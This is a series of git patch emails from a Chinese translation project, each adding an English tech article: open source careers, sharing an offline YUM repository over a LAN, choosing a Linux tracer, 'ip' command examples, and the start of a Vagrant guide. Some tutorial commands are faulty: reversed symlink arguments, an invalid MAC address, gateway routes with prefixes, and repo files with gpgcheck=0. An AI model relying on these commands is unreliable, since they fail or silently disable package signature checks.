+
+### 4. Increase your connections and network
+
+Open source projects are maintained and surrounded by diverse communities. Some individuals working on open source projects do so in their free time, and they all have their own backstories, interests, and connections. As they say, "it's all about who you know." You may never meet certain people except through working an open source project. Maybe you'll work with people around the world, or maybe you'll connect with your next-door neighbor. Regardless, you never know who may help connect you to your next job. The connections and networking possibilities exposed through an open source project may be extremely helpful in finding your next (or first!) job.
+
+### 5. Build confidence
+
+Finally, contributing to open source projects may give you a newfound confidence. Many new employees in the tech industry may feel a sense of [imposter syndrome][4], because without having accomplished significant work, they may feel they don't belong, they are frauds, or they don't deserve to be in their new position. Working on open source projects before you are hired may minimize this issue.
+
+Work on open source projects is often done individually, but it all contributes to the project as a whole. Open source communities are highly inclusive and cooperative, and your contributions will be noticed. It is always rewarding to be validated by other community members (especially more senior members). The recognition you may gain from code commits to an open source project could improve your confidence and counter imposter syndrome. This confidence can then carry over to interviews, new positions, and beyond.
+
+These are only a handful of the benefits you may see from working on open source projects. If you know of other advantages, please share them in the comments below.
+### About The Author
+Sophie Polson;Sophie Is A Senior At Duke University Studying Computer Science. She Has Just Started To Venture Into The Open Source Community Via The Course;Open Source World;Taught At Duke In The Fall Of;Has Developed An Interest In Exploring Devops. She Will Be Working As A Software Engineer Following Her Graduation In The Spring Of
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/5-ways-turn-open-source-new-job
+
+作者:[Sophie Polson][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/sophiepolson
+[1]:https://github.com/dbaldwin/DronePan
+[2]:https://www.thebalance.com/why-you-should-ask-questions-in-a-job-interview-1669548
+[3]:https://www.computerworld.com/article/3177442/it-careers/lifelong-learning-is-no-longer-optional.html
+[4]:https://en.wikipedia.org/wiki/Impostor_syndrome
From 5480b1059c4937d7ea271e527d76a90ef8e442e9 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:58:43 +0800
Subject: [PATCH 045/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Creating=20an=20O?=
=?UTF-8?q?ffline=20YUM=20repository=20for=20LAN?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ating an Offline YUM repository for LAN.md | 111 ++++++++++++++++++
1 file changed, 111 insertions(+)
create mode 100644 sources/tech/20180103 Creating an Offline YUM repository for LAN.md
diff --git a/sources/tech/20180103 Creating an Offline YUM repository for LAN.md b/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
new file mode 100644
index 0000000000..315da3efbd
--- /dev/null
+++ b/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
@@ -0,0 +1,111 @@
+translating by lujun9972
+Creating an Offline YUM repository for LAN
+======
+In our earlier tutorial, we discussed " **[How we can create our own yum repository with ISO image& by mirroring an online yum repository][1]** ". Creating your own yum repository is a good idea but not ideal if you are only using 2-3 Linux machines on your network. But it definitely has advantages when you have large number of Linux servers on your network that are updated regularly or when you have some sensitive Linux machines that can't be exposed to Internet directly.
+
+When we have large number of Linux systems & each system is updating directly from internet, data consumed will be enormous. In order to save the data, we can create an offline yum & share it over our Local network. Other Linux machines on network will then fetch system updates directly from this Local yum, thus saving data & also transfer speed also be very good since we will be on our local network.
+
+We can share our yum repository using any of the following or both methods:
+
+ * **Using Web Server (Apache)**
+ * **Using ftp (VSFTPD)**
+
+
+
+We will be discussing both of these methods but before we start, you should create a YUM repository using my earlier tutorial ( **[READ HERE][1]** )
+
+
+## Using Web Server
+
+Firstly we need to install web-server (Apache) on our yum server which has IP address **192.168.1.100**. Since we have already configured a yum repository for this system, we will install apache web server using yum command,
+
+```
+$ yum install httpd
+```
+
+Next, we need to copy all the rpm packages to default apache root directory i.e. **/var/www/html** or since we have already copied our packages to **/YUM** , we can create a symbolic link from /var/www/html to /YUM
+
+```
+$ ln -s /var/www/html/Centos /yum
+```
+
+Restart you web-server to implement changes
+
+```
+$ systemctl restart httpd
+```
+
+
+### Configuring client machine
+
+Configurations for sharing Yum repository on server side are complete & now we will configure our client machine, with an IP address **192.168.1.101** , to receive updates from our created offline yum.
+
+Create a file named **offline-yum.repo** in **/etc/yum.repos.d** folder & enter the following details,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+name=Local YUM
+baseurl=http://192.168.1.100/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+We have configured your Linux machine to receive updates over LAN from your offline yum repository. To confirm if the repository is working fine, try to install/update packages using yum command.
+
+## Using FTP server
+
+For sharing our YUM over ftp, we will firstly install the required package i.e vsftpd
+
+```
+$ yum install vsftpd
+```
+
+Default root directory for vsftp is /var/ftp/pub, so either copy rpm packages to this folder or create a symbolic link from /var/ftp/pub,
+
+```
+$ ln -s /var/ftp/pub /YUM
+```
+
+Now, restart server for implement the changes
+
+```
+$ systemctl restart vsftpd
+```
+
+### Configuring client machine
+
+We will now create a file named **offline-yum.repo** in **/etc/yum.repos.d** , as we did above & enter the following details,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+[Offline YUM]
+name=Local YUM
+baseurl=ftp://192.168.1.100/pub/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+Your client machine is now ready to receive updates over ftp. For configuring vsftpd server to share files with other Linux system , [**read tutorial here**][2].
+
+Both methods for sharing an offline yum over LAN are good & you can choose either of them, both of these methods should work fine. If you are having any queries/comments, please share them in the comment box down below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/offline-yum-repository-for-lan/
+
+作者:[Shusain][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
+[2]:http://linuxtechlab.com/ftp-secure-installation-configuration/
From abf8d969cfe0a7a03df43f1859f501b3e4e0fbed Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:30:03 +0800
Subject: [PATCH 046/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Choosing=20a=20Li?=
=?UTF-8?q?nux=20Tracer=20(2015)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20150708 Choosing a Linux Tracer (2015).md | 192 ++++++++++++++++++
1 file changed, 192 insertions(+)
create mode 100644 sources/tech/20150708 Choosing a Linux Tracer (2015).md
diff --git a/sources/tech/20150708 Choosing a Linux Tracer (2015).md b/sources/tech/20150708 Choosing a Linux Tracer (2015).md
new file mode 100644
index 0000000000..4f23184802
--- /dev/null
+++ b/sources/tech/20150708 Choosing a Linux Tracer (2015).md
@@ -0,0 +1,192 @@
+Choosing a Linux Tracer (2015)
+======
+[![][1]][2]
+_Linux Tracing is Magic!_
+
+A tracer is an advanced performance analysis and troubleshooting tool, but don't let that intimidate you... If you've used strace(1) or tcpdump(8) - you've used a tracer. System tracers can see much more than just syscalls or packets, as they can typically trace any kernel or application software.
+
+There are so many Linux tracers that the choice is overwhelming. As each has an official (or unofficial) pony-corn mascot, we have enough for a kids' show.
+
+Which tracer should you use?
+
+I've answered this question for two audiences: for most people, and, for performance/kernel engineers. This will also change over time, so I'll need to post follow-ups, maybe once a year or so.
+
+## For Most People
+
+Most people (developers, sysadmins, devops, SREs, ...) are not going to learn a system tracer in gory detail. Here's what you most likely need to know and do about tracers:
+
+### 1. Use perf_events for CPU profiling
+
+Use perf_events to do CPU profiling. The profile can be visualized as a [flame graph][3]. Eg:
+```
+git clone --depth 1 https://github.com/brendangregg/FlameGraph
+perf record -F 99 -a -g -- sleep 30
+perf script | ./FlameGraph/stackcollapse-perf.pl | ./FlameGraph/flamegraph.pl > perf.svg
+
+```
+
+Linux perf_events (aka "perf", after its command) is the official tracer/profiler for Linux users. It is in the kernel source, and is well maintained (and currently rapidly being enhanced). It's usually added via a linux-tools-common package.
+
+perf can do many things, but if I had to recommend you learn just one, it would be CPU profiling. Even though this is not technically "tracing" of events, as it's sampling. The hardest part is getting full stacks and symbols to work, which I covered in my [Linux Profiling at Netflix][4] talk for Java and Node.js.
+
+### 2. Know what else is possible
+
+As a friend once said: "You don't need to know how to operate an X-ray machine, but you _do_ need to know that if you swallow a penny, an X-ray is an option!" You need to know what is possible with tracers, so that if your business really needs it, you can either learn how to do it later, or hire someone who does.
+
+In a nutshell: performance of virtually anything can be understood with tracing. File system internals, TCP/IP processing, device drivers, application internals. Read my lwn.net [article on ftrace][5], and browse my [perf_events page][6], as examples of some tracing (and profiling) capabilities.
+
+### 3. Ask for front ends
+
+If you are paying for performance analysis tools (and there are many companies that sell them), ask for Linux tracing support. Imagine an intuitive point-and-click interface that can expose kernel internals, including latency heatmaps at different stack locations. I described such an interface in my [Monitorama talk][7].
+
+I've created and open sourced some front ends myself, although for the CLI (not GUIs). These also allow people to benefit from the tracers more quickly and easily. Eg, from my [perf-tools][8], tracing new processes:
+```
+# ./execsnoop
+Tracing exec()s. Ctrl-C to end.
+ PID PPID ARGS
+ 22898 22004 man ls
+ 22905 22898 preconv -e UTF-8
+ 22908 22898 pager -s
+ 22907 22898 nroff -mandoc -rLL=164n -rLT=164n -Tutf8
+[...]
+
+```
+
+At Netflix, we're creating [Vector][9], an instance analysis tool that should also eventually front Linux tracers.
+
+## For Performance or Kernel Engineers
+
+Our job is much harder, since most people may be asking us to figure out how to trace something, and therefore which tracer to use. To properly understand a tracer, you usually need to spend at least one hundred hours with it. Understanding all the Linux tracers to make a rational decision between them a huge undertaking. (I may be the only person who has come close to doing this.)
+
+Here's what I'd recommend. Either:
+
+A) Pick one all-powerful tracer, and standardize on that. This will involve a lot of time figuring out its nuances and safety in a test environment. I'd currently recommend the latest version of SystemTap (ie, build from [source][10]). I know of companies that have picked LTTng, and are happy with it, although it's not quite as powerful (although, it is safer). If sysdig adds tracepoints or kprobes, it could be another candidate.
+
+B) Follow the above flow chart from my [Velocity tutorial][11]. It will mean using ftrace or perf_events as much as possible, eBPF as it gets integrated, and then other tracers like SystemTap/LTTng to fill in the gaps. This is what I do in my current job at Netflix.
+
+Comments by tracer:
+
+### 1. ftrace
+
+I love [Ftrace][12], it's a kernel hacker's best friend. It's built into the kernel, and can consume tracepoints, kprobes, and uprobes, and provides a few capabilities: event tracing, with optional filters and arguments; event counting and timing, summarized in-kernel; and function-flow walking. See [ftrace.txt][13] from the kernel source for examples. It's controlled via /sys, and is intended for a single root user (although you could hack multi-user support using buffer instances). Its interface can be fiddly at times, but it's quite hackable, and there are front ends: Steven Rostedt, the main ftrace author, has created trace-cmd, and I've created the perf-tools collection. My biggest gripe is that it isn't programmable, so you can't, for example, save and fetch timestamps, calculate latency, and then store it as a histogram. You'll need to dump events to user-level, and post-process, at some cost. It may become programmable via eBPF.
+
+### 2. perf_events
+
+[perf_events][14] is the main tracing tool for Linux users, its source is in the Linux kernel, and is usually added via a linux-tools-common package. Aka "perf", after its front end, which is typically used to trace & dump to a file (perf.data), which it does relatively efficiently (dynamic buffering), and then post-processeses that later. It can do most of what ftrace can. It can't do function-flow walking, and is a bit less hackable (as it has better safety/error checking). But it can do profiling (sampling), CPU performance counters, user-level stack translation, and can consume debuginfo for line tracing with local variables. It also supports multiple concurrent users. As with ftrace, it isn't kernel programmable yet, until perhaps eBPF support (patches have been proposed). If there's one tracer I'd recommend people learn, it'd be perf, as it can solve a ton of issues, and is relatively safe.
+
+### 3. eBPF
+
+The extended Berkeley Packet Filter is an in-kernel virtual machine that can run programs on events, efficiently (JIT). It's likely to eventually provide in-kernel programming for ftrace and perf_events, and to enhance other tracers. It's currently being developed by Alexei Starovoitov, and isn't fully integrated yet, but there's enough in-kernel (as of 4.1) for some impressive tools: eg, latency heat maps of block device I/O. For reference, see the [BPF slides][15] from Alexei, and his [eBPF samples][16].
+
+### 4. SystemTap
+
+[SystemTap][17] is the most powerful tracer. It can do everything: profiling, tracepoints, kprobes, uprobes (which came from SystemTap), USDT, in-kernel programming, etc. It compiles programs into kernel modules and loads them - an approach which is tricky to get safe. It is also developed out of tree, and has had issues in the past (panics or freezes). Many are not SystemTap's fault - it's often the first to use certain tracing capabilities with the kernel, and the first to run into bugs. The latest version of SystemTap is much better (you must compile from source), but many people are still spooked from earlier versions. If you want to use it, spend time in a test environment, and chat to the developers in #systemtap on irc.freenode.net. (Netflix has a fault-tolerant architecture, and we have used SystemTap, but we may be less concerned about safety than you.) My biggest gripe is that it seems to assume you'll have kernel debuginfo, which I don't usually have. It actually can do a lot without it, but documentation and examples are lacking (I've begun to help with that myself).
+
+### 5. LTTng
+
+[LTTng][18] has optimized event collection, which outperforms other tracers, and also supports numerous event types, including USDT. It is developed out of tree. The core of it is very simple: write events to a tracing buffer, via a small and fixed set of instructions. This helps make it safe and fast. The downside is that there's no easy way to do in-kernel programming. I keep hearing that this is not a big problem, since it's so optimized that it can scale sufficiently despite needing post processing. It also has been pioneering a different analysis technique, more of a black box recording of all interesting events that can be studied in GUIs later. I'm concerned about such a recording missing events I didn't have the foresight to record, but I really need to spend more time with it to see how well it works in practice. It's the tracer I've spent the least time with (no particular reason).
+
+### 6. ktap
+
+[ktap][19] was a really promising tracer, which used an in-kernel lua virtual machine for processing, and worked fine without debuginfo and on embedded devices. It made it into staging, and for a moment looked like it would win the trace race on Linux. Then eBPF began kernel integration, and ktap integration was postponed until it could use eBPF instead of its own VM. Since eBPF is still integrating many months later, the ktap developers have been waiting a long time. I hope it restarts development later this year.
+
+### 7. dtrace4linux
+
+[dtrace4linux][20] is mostly one man's part-time effort (Paul Fox) to port Sun DTrace to Linux. It's impressive, and some providers work, but it's some ways from complete, and is more of an experimental tool (unsafe). I think concern over licensing has left people wary of contributing: it will likely never make it into the Linux kernel, as Sun released DTrace under the CDDL license; Paul's approach to this is to make it an add-on. I'd love to see DTrace on Linux and this project finished, and thought I'd spend time helping it finish when I joined Netflix. However, I've been spending time using the built-in tracers, ftrace and perf_events, instead.
+
+### 8. OL DTrace
+
+[Oracle Linux DTrace][21] is a serious effort to bring DTrace to Linux, specifically Oracle Linux. Various releases over the years have shown steady progress. The developers have even spoken about improving the DTrace test suite, which shows a promising attitude to the project. Many useful providers have already been completed: syscall, profile, sdt, proc, sched, and USDT. I'm still waiting for fbt (function boundary tracing, for kernel dynamic tracing), which will be awesome on the Linux kernel. Its ultimate success will hinge on whether it's enough to tempt people to run Oracle Linux (and pay for support). Another catch is that it may not be entirely open source: the kernel components are, but I've yet to see the user-level code.
+
+### 9. sysdig
+
+[sysdig][22] is a new tracer that can operate on syscall events with tcpdump-like syntax, and lua post processing. It's impressive, and it's great to see innovation in the system tracing space. Its limitations are that it is syscalls only at the moment, and, that it dumps all events to user-level for post processing. You can do a lot with syscalls, although I'd like to see it support tracepoints, kprobes, and uprobes. I'd also like to see it support eBPF, for in-kernel summaries. The sysdig developers are currently adding container support. Watch this space.
+
+## Further Reading
+
+My own work with the tracers includes:
+
+**ftrace** : My [perf-tools][8] collection (see the examples directory); my lwn.net [article on ftrace][5]; a [LISA14][8] talk; and the posts: [function counting][23], [iosnoop][24], [opensnoop][25], [execsnoop][26], [TCP retransmits][27], [uprobes][28], and [USDT][29].
+
+**perf_events** : My [perf_events Examples][6] page; a [Linux Profiling at Netflix][4] talk for SCALE; and the posts [CPU Sampling][30], [Static Tracepoints][31], [Heat Maps][32], [Counting][33], [Kernel Line Tracing][34], [off-CPU Time Flame Graphs][35].
+
+**eBPF** : The post [eBPF: One Small Step][36], and some [BPF-tools][37] (I need to publish more).
+
+**SystemTap** : I wrote a [Using SystemTap][38] post a long time ago, which is somewhat out of date. More recently I published some [systemtap-lwtools][39], showing how SystemTap can be used without kernel debuginfo.
+
+**LTTng** : I've used it a little, but not enough yet to publish anything.
+
+**ktap** : My [ktap Examples][40] page includes one-liners and scripts, although these were for an earlier version.
+
+**dtrace4linux** : I included some examples in my [Systems Performance book][41], and I've developed some small fixes for things in the past, eg, [timestamps][42].
+
+**OL DTrace** : As this is a straight port of DTrace, much of my earlier DTrace work should be relevant (too many links to list here; search on [my homepage][43]). I may develop some specific tools once this is more complete.
+
+**sysdig** : I contributed the [fileslower][44] and [subsecond offset spectrogram][45] chisels.
+
+**others** : I did write a warning post about [strace][46].
+
+Please, no more tracers! ... If you're wondering why Linux doesn't just have one, or DTrace itself, I answered these in my [From DTrace to Linux][47] talk, starting on [slide 28][48].
+
+Thanks to [Deirdre Straughan][49] for edits, and for creating the tracing ponies (with General Zoi's pony creator).
+
+--------------------------------------------------------------------------------
+
+via: http://www.brendangregg.com/blog/2015-07-08/choosing-a-linux-tracer.html
+
+作者:[Brendan Gregg.][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.brendangregg.com
+[1]:http://www.brendangregg.com/blog/images/2015/tracing_ponies.png
+[2]:http://www.slideshare.net/brendangregg/velocity-2015-linux-perf-tools/105
+[3]:http://www.brendangregg.com/FlameGraphs/cpuflamegraphs.html
+[4]:http://www.brendangregg.com/blog/2015-02-27/linux-profiling-at-netflix.html
+[5]:http://lwn.net/Articles/608497/
+[6]:http://www.brendangregg.com/perf.html
+[7]:http://www.brendangregg.com/blog/2015-06-23/netflix-instance-analysis-requirements.html
+[8]:http://www.brendangregg.com/blog/2015-03-17/linux-performance-analysis-perf-tools.html
+[9]:http://techblog.netflix.com/2015/04/introducing-vector-netflixs-on-host.html
+[10]:https://sourceware.org/git/?p=systemtap.git;a=blob_plain;f=README;hb=HEAD
+[11]:http://www.slideshare.net/brendangregg/velocity-2015-linux-perf-tools
+[12]:http://lwn.net/Articles/370423/
+[13]:https://www.kernel.org/doc/Documentation/trace/ftrace.txt
+[14]:https://perf.wiki.kernel.org/index.php/Main_Page
+[15]:http://www.phoronix.com/scan.php?page=news_item&px=BPF-Understanding-Kernel-VM
+[16]:https://github.com/torvalds/linux/tree/master/samples/bpf
+[17]:https://sourceware.org/systemtap/wiki
+[18]:http://lttng.org/
+[19]:http://ktap.org/
+[20]:https://github.com/dtrace4linux/linux
+[21]:http://docs.oracle.com/cd/E37670_01/E38608/html/index.html
+[22]:http://www.sysdig.org/
+[23]:http://www.brendangregg.com/blog/2014-07-13/linux-ftrace-function-counting.html
+[24]:http://www.brendangregg.com/blog/2014-07-16/iosnoop-for-linux.html
+[25]:http://www.brendangregg.com/blog/2014-07-25/opensnoop-for-linux.html
+[26]:http://www.brendangregg.com/blog/2014-07-28/execsnoop-for-linux.html
+[27]:http://www.brendangregg.com/blog/2014-09-06/linux-ftrace-tcp-retransmit-tracing.html
+[28]:http://www.brendangregg.com/blog/2015-06-28/linux-ftrace-uprobe.html
+[29]:http://www.brendangregg.com/blog/2015-07-03/hacking-linux-usdt-ftrace.html
+[30]:http://www.brendangregg.com/blog/2014-06-22/perf-cpu-sample.html
+[31]:http://www.brendangregg.com/blog/2014-06-29/perf-static-tracepoints.html
+[32]:http://www.brendangregg.com/blog/2014-07-01/perf-heat-maps.html
+[33]:http://www.brendangregg.com/blog/2014-07-03/perf-counting.html
+[34]:http://www.brendangregg.com/blog/2014-09-11/perf-kernel-line-tracing.html
+[35]:http://www.brendangregg.com/blog/2015-02-26/linux-perf-off-cpu-flame-graph.html
+[36]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html
+[37]:https://github.com/brendangregg/BPF-tools
+[38]:http://dtrace.org/blogs/brendan/2011/10/15/using-systemtap/
+[39]:https://github.com/brendangregg/systemtap-lwtools
+[40]:http://www.brendangregg.com/ktap.html
+[41]:http://www.brendangregg.com/sysperfbook.html
+[42]:https://github.com/dtrace4linux/linux/issues/55
+[43]:http://www.brendangregg.com
+[44]:https://github.com/brendangregg/sysdig/commit/d0eeac1a32d6749dab24d1dc3fffb2ef0f9d7151
+[45]:https://github.com/brendangregg/sysdig/commit/2f21604dce0b561407accb9dba869aa19c365952
+[46]:http://www.brendangregg.com/blog/2014-05-11/strace-wow-much-syscall.html
+[47]:http://www.brendangregg.com/blog/2015-02-28/from-dtrace-to-linux.html
+[48]:http://www.slideshare.net/brendangregg/from-dtrace-to-linux/28
+[49]:http://www.beginningwithi.com/
From 283f6979a610772a5368f7da3ba81ca89f9ea62b Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:39:59 +0800
Subject: [PATCH 047/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2012=20ip=20Command?=
=?UTF-8?q?=20Examples=20for=20Linux=20Users?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... 12 ip Command Examples for Linux Users.md | 196 ++++++++++++++++++
1 file changed, 196 insertions(+)
create mode 100644 sources/tech/20170915 12 ip Command Examples for Linux Users.md
diff --git a/sources/tech/20170915 12 ip Command Examples for Linux Users.md b/sources/tech/20170915 12 ip Command Examples for Linux Users.md
new file mode 100644
index 0000000000..ded3be8f3b
--- /dev/null
+++ b/sources/tech/20170915 12 ip Command Examples for Linux Users.md
@@ -0,0 +1,196 @@
+translating by lujun9972
+12 ip Command Examples for Linux Users
+======
+For years & years we have been using ' **ifconfig** ' command to perform network related tasks like checking network interfaces or configuring them. But 'ifconfig' is no longer being maintained & has been deprecated on the recent versions of Linux. 'ifconfig' command has been replaced with ' **ip** ' command.
+
+'ip' command is somewhat similar to 'ifconfig' command but it's much more powerful with much more functionalities attached to it. 'ip' command is able to perform several tasks which were not possible to perform with 'ifconfig' command.
+
+[![IP-command-examples-Linux][1]![IP-command-examples-Linux][2]][3]
+
+In this tutorial, we are going to discuss 12 most common uses for 'ip' command, so let's get going,
+
+#### Example 1: Checking network information for interfaces ( LAN Cards )
+
+To check the network information like IP address, Subnet etc for the interfaces, use 'ip addr show' command
+```
+[linuxtechi@localhost]$ ip addr show
+
+or
+
+[linuxtechi@localhost]$ ip a s
+```
+
+This will show network information related to all interfaces available on our system, but if we want to view same information for single interface, command is
+```
+[linuxtechi@localhost]$ ip addr show enp0s3
+```
+
+where enp0s3 is the name of the interface.
+
+[![IP-addr-show-commant-output][1]![IP-addr-show-commant-output][4]][5]
+
+#### Example 2: Enabling & disabling a network interface
+
+To enable a disable network interface, 'ip' command used is
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 up
+```
+
+& to disable the network interface we will use 'down' trigger,
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 down
+```
+
+#### Example 3: Assigning IP address & other network information to an interface
+
+To assign IP address to interface, we will use
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
+```
+
+We can also set broadcast address to interface with 'ip' command. By default no broadcast address is set, so to set a broadcast address command is
+```
+[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
+```
+
+We can also set standard broadcast address along with IP address by using the following command,
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
+```
+
+As shown in the above example, we can also use 'brd' in place on 'broadcast' to set broadcast ip address.
+
+#### Example 4: Removing IP address from interface
+
+If we want to flush or remove the assigned IP from interface, then the beneath ip command
+```
+[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
+```
+
+#### Example 5: Adding an Alias for an interface (enp0s3)
+
+To add an alias i.e. assign more than one IP to an interface, execute below command
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
+```
+
+[![ip-command-add-alias-linux][1]![ip-command-add-alias-linux][6]][7]
+
+#### Example 6: Checking route or default gateway information
+
+Checking routing information shows us the route a packet will take to reach the destination. To check the network routing information, execute the following command,
+```
+[linuxtechi@localhost]$ ip route show
+```
+
+[![ip-route-command-output][1]![ip-route-command-output][8]][9]
+
+In the output we will see the routing information for packets for all the network interfaces. We can also get the routing information to a particular ip using,
+```
+[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
+```
+
+#### Example 7: Adding a static route
+
+If we want to change the default route taken by packets, we can do so with IP command. To assign a default gateway, use following 'ip route' command
+```
+[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
+```
+
+So now all network packets will travel via 192.168.0.150 as opposed to old default route. For changing the default route for a single interface & to make change route further, execute
+```
+[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
+```
+
+#### Example 8: Removing a static route
+
+To remove the a previously changes default route, open terminal & run,
+```
+[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
+```
+
+**Note:-** Changes made to default route using the above mentioned commands are only temporary & all changes will be lost after a system has been restarted. To make a persistence route change, we need to modify / create route-enp0s3 file . Add the following line to it, demonstration is shown below
+```
+[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
+
+172.16.32.32 via 192.168.0.150/24 dev enp0s3
+```
+
+Save and Exit the file.
+
+If you are using Ubuntu or debian based OS, than the location of the file is ' **/etc/network/interfaces** ' and add the line "ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3" to the bottom of the file.
+
+#### Example 9: Checking all ARP entries
+
+ARP, short for ' **Address Resolution Protocol** ' , is used to convert an IP address to physical address (also known as MAC address) & all the IP and their corresponding MAC details are stored in a table known as ARP cache.
+
+To view entries in ARP cache i.e. MAC addresses of the devices connected in LAN, the IP command used is
+```
+[linuxtechi@localhost]$ ip neigh
+```
+
+[![ip-neigh-command-linux][1]![ip-neigh-command-linux][10]][11]
+
+#### Example 10: Modifying ARP entries
+
+To delete an ARP entry, the command used is
+```
+[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
+```
+
+or if we want to add a new entry to ARP cache, the command is
+```
+[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1g:75:37:r3:84 dev enp0s3 nud perm
+```
+
+where **nud** means **neighbour state** , it can be
+
+ * **perm** - permanent & can only be removed by administrator,
+ * **noarp** - entry is valid but can be removed after lifetime expires,
+ * **stale** - entry is valid but suspicious,
+ * **reachable** - entry is valid until timeout expires.
+
+
+
+#### Example 11: Checking network statistics
+
+With 'ip' command we can also view the network statistics like bytes and packets transferred, errors or dropped packets etc for all the network interfaces. To view network statistics, use ' **ip -s link** ' command
+```
+[linuxtechi@localhost]$ ip -s link
+```
+
+[![ip-s-command-linux][1]![ip-s-command-linux][12]][13]
+
+#### Example 12: How to get help
+
+If you want to find a option which is not listed in above examples, then you can look for help. In Fact you can use help for all the commands. To list all available options that can be used with 'ip' command, use
+```
+[linuxtechi@localhost]$ ip help
+```
+
+Remember that 'ip' command is very important command for Linux admins and it should be learned and mastered to configure network with ease. That's it for now, please do provide your suggestions & leave your queries in the comment box below.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
+
+作者:[Pradeep Kumar][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxtechi.com/author/pradeep/
+[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
+[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
+[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
+[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
+[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
+[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
+[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
+[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
+[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
+[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
+[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
+[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
+[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
From fbb1d4cefa0020465843a1d8713d595cfd0ee039 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:42:54 +0800
Subject: [PATCH 048/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Instal?=
=?UTF-8?q?l=20And=20Setup=20Vagrant?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...170915 How To Install And Setup Vagrant.md | 265 ++++++++++++++++++
1 file changed, 265 insertions(+)
create mode 100644 sources/tech/20170915 How To Install And Setup Vagrant.md
diff --git a/sources/tech/20170915 How To Install And Setup Vagrant.md b/sources/tech/20170915 How To Install And Setup Vagrant.md
new file mode 100644
index 0000000000..1e76600595
--- /dev/null
+++ b/sources/tech/20170915 How To Install And Setup Vagrant.md
@@ -0,0 +1,265 @@
+How To Install And Setup Vagrant
+======
+Vagrant is a powerful tool when it comes to virtual machines, here we will look at how to setup and use Vagrant with Virtualbox on Ubuntu to provision reproducible virtual machines.
